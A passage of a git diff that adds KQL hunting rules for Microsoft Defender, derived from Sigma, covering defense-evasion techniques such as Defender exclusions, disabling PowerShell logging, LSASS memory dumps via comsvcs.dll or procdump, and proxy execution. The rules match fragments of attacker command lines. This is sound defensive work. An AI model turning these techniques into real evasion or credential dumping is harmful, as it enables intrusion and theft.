"RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql new file mode 100644 index 00000000..19f19cf2 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql @@ -0,0 +1,13 @@ +// Title: Powershell Defender Exclusion +// Author: Florian Roth (Nextron Systems) +// Date: 2021-04-29 +// Level: medium +// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible Admin Activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql new file mode 100644 index 00000000..36da9f08 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql @@ -0,0 +1,15 @@ +// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: high +// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). +This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. +An attacker might use this technique via the command line to bypass defenses before executing payloads. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql new file mode 100644 index 00000000..dc49a90c --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql @@ -0,0 +1,12 @@ +// Title: Powershell Executed From Headless ConHost Process +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the use of powershell commands from headless ConHost window. +The "--headless" flag hides the windows from the user upon execution. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql new file mode 100644 index 00000000..f3709ea0 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Logging Disabled Via Registry Key Tampering +// Author: frack113 +// Date: 2022-04-02 +// Level: high +// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql new file mode 100644 index 00000000..1f796e48 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Script Change Permission Via Set-Acl +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects PowerShell execution to set the ACL of a file or a folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql new file mode 100644 index 00000000..653acae6 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Set-Acl On Windows Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql new file mode 100644 index 00000000..8c648c23 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql @@ -0,0 +1,10 @@ +// Title: Powershell Token Obfuscation - Process Creation +// Author: frack113 +// Date: 2022-12-27 +// Level: high +// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.009 + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql new file mode 100644 index 00000000..0708ecd6 --- /dev/null +++ b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql @@ -0,0 +1,10 @@ +// Title: Prefetch File Deleted +// Author: Cedric MAURUGEON +// Date: 2021-09-29 +// Level: high +// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceFileEvents +| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/Defense Evasion/procdump_execution.kql new file mode 100644 index 00000000..79edbce1 --- /dev/null +++ b/KQL/rules/Defense Evasion/procdump_execution.kql @@ -0,0 +1,12 @@ +// Title: Procdump Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-16 +// Level: medium +// Description: Detects usage of the SysInternals Procdump utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Legitimate use of procdump by a developer or administrator + +DeviceProcessEvents +| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql new file mode 100644 index 00000000..efb0fafa --- /dev/null +++ b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql @@ -0,0 +1,10 @@ +// Title: Process Access via TrolleyExpress Exclusion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-10 +// Level: high +// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql new file mode 100644 index 00000000..43b5b502 --- /dev/null +++ b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql @@ -0,0 +1,10 @@ +// Title: Process Creation Using Sysnative Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-08-23 +// Level: medium +// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql new file mode 100644 index 00000000..a7e38ca7 --- /dev/null +++ b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql @@ -0,0 +1,10 @@ +// Title: Process Execution From A Potentially Suspicious Folder +// Author: Florian Roth (Nextron Systems), Tim Shelton +// Date: 2019-01-16 +// Level: high +// Description: Detects a potentially suspicious execution from an uncommon folder. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql new file mode 100644 index 00000000..6cbdad72 --- /dev/null +++ b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql @@ -0,0 +1,12 @@ +// Title: Process Launched Without Image Name +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Rare legitimate software. + +DeviceProcessEvents +| where FolderPath endswith "\\.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql new file mode 100644 index 00000000..ff040eff --- /dev/null +++ b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql @@ -0,0 +1,12 @@ +// Title: Process Memory Dump Via Comsvcs.DLL +// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2020-02-18 +// Level: high +// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql new file mode 100644 index 00000000..595bfd68 --- /dev/null +++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql @@ -0,0 +1,13 @@ +// Title: Process Memory Dump Via Dotnet-Dump +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated + +DeviceProcessEvents +| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql new file mode 100644 index 00000000..b67708b4 --- /dev/null +++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql @@ -0,0 +1,13 @@ +// Title: Process Proxy Execution Via Squirrel.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2022-06-09 +// Level: medium +// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) + +DeviceProcessEvents +| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql new file mode 100644 index 00000000..9ccb15f5 --- /dev/null +++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql @@ -0,0 +1,16 @@ +// Title: Proxy Execution via Vshadow +// Author: David Faiss +// Date: 2025-05-26 +// Level: medium +// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits. +VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag, +attackers can leverage this parameter to proxy the execution of malware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - System backup or administrator tools +// - Legitimate administrative scripts + +DeviceProcessEvents +| where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql new file mode 100644 index 00000000..14cef805 --- /dev/null +++ b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql @@ -0,0 +1,10 @@ +// Title: Proxy Execution Via Wuauclt.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team +// Date: 2020-10-12 +// Level: high +// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution + +DeviceProcessEvents +| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql new file mode 100644 index 00000000..83d5c4da --- /dev/null +++ b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql @@ -0,0 +1,10 @@ +// Title: PSScriptPolicyTest Creation By Uncommon Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents +| where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql new file mode 100644 index 00000000..96c32fb2 --- /dev/null +++ b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - AdvancedRun Suspicious Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-20 +// Level: high +// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql new file mode 100644 index 00000000..bfa23331 --- /dev/null +++ b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - CleanWipe Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: high +// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrative use (Should be investigated either way) + +DeviceProcessEvents +| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql new file mode 100644 index 00000000..df5cb69e --- /dev/null +++ b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - DefenderCheck Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql new file mode 100644 index 00000000..185532c8 --- /dev/null +++ b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql @@ -0,0 +1,12 @@ +// Title: PUA - Potential PE Metadata Tamper Using Rcedit +// Author: Micah Babinski +// Date: 2022-12-11 +// Level: medium +// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027 +// False Positives: +// - Legitimate use of the tool by administrators or users to update metadata of a binary + +DeviceProcessEvents +| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql new file mode 100644 index 00000000..875e0868 --- /dev/null +++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql @@ -0,0 +1,15 @@ +// Title: PUA - Process Hacker Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-10 +// Level: medium +// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). +Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. +Threat actors abused older vulnerable versions to manipulate system processes. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543 +// False Positives: +// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis + +DeviceProcessEvents +| where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith 